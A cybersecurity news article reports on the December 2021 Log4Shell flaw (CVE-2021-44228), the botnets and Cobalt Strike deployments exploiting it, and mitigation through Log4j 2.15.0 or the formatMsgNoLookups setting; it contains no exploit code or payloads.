Hackers Exploiting Log4j 0-day Flaw to deploy Malware on Vulnerable Servers

A new 0-day exploit with the popular Java logging library log4j lets attackers execute remote code and gain full control over the server.

Log4j is a part of Apache Logging Services that is Widely used by both enterprise apps and cloud services.

A security researcher published the 0-day flaw published on Twitter and also the PoC posted on GitHub. Log4j team tracked the flaw as CVE-2021-44228 and dubbed Log4Shell or LogJam.

Impact of the Flaw

The vulnerability affects multiple frameworks that include multiple Apache frameworks, including Apache Struts2, Apache Solr, Apache Druid, Apache Flink, and others.

It affects several popular services and apps that include Apple, Amazon, Cloudflare, Twitter, and Steam.

PoC

A server with log4j version vulnerable to attacks;

Hackers Exploiting Log4j 0-day to Deploy Malware

Now attackers started scanning for Log4Shell vulnerability to deploy malware or to find vulnerable servers.

Netlab 360 spotted that the vulnerability was scanned to install Mirai and Muhstik malware on vulnerable devices.

We are seeing 4 botnets using this now. https://t.co/wtunZ0dbM5
— 360 Netlab (@360Netlab) December 12, 2021

Microsoft Threat Intelligence Center reported that Log4j vulnerabilities can be used to deploy Cobalt Strike beacons.

MSRC has just published a blog post for Microsoft's response to CVE-2021-44228 Apache Log4j 2https://t.co/e0fucAyhzj
— Security Response (@msftsecresponse) December 12, 2021

Cloudflare CEO Matthew Prince stated that “we’ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC. That suggests it was in the wild at least 9 days before publicly disclosed. However, don’t see evidence of mass exploitation until after public disclosure.”

Earliest evidence we’ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC. That suggests it was in the wild at least 9 days before publicly disclosed. However, don’t see evidence of mass exploitation until after public disclosure.
— Matthew Prince 🌥 (@eastdakota) December 11, 2021

Mitigation

The flaw CVE-2021-44228 has been addressed in Log4j 2.15.0, customers are requested to take immediate actions.

The CVE-2021-44228 can only be exploited if the log4j2.formatMsgNoLookups parameter is set to false. As in Log4j 2.15.0 release this parameter is set to true, simply to prevent attacks.

This implies that the Log4j users who have upgraded to version 2.15.0 and then set the flag to false will again become vulnerable to attacks.

While the users who have not updated yet, and have set the flag to true, will be able to block these attacks even on the older versions as well. However, currently, all the older versions are vulnerable, where by default this parameter is set to “false.”

You can follow us on Linkedin, Twitter, Facebook for daily Cybersecurity and hacking news updates.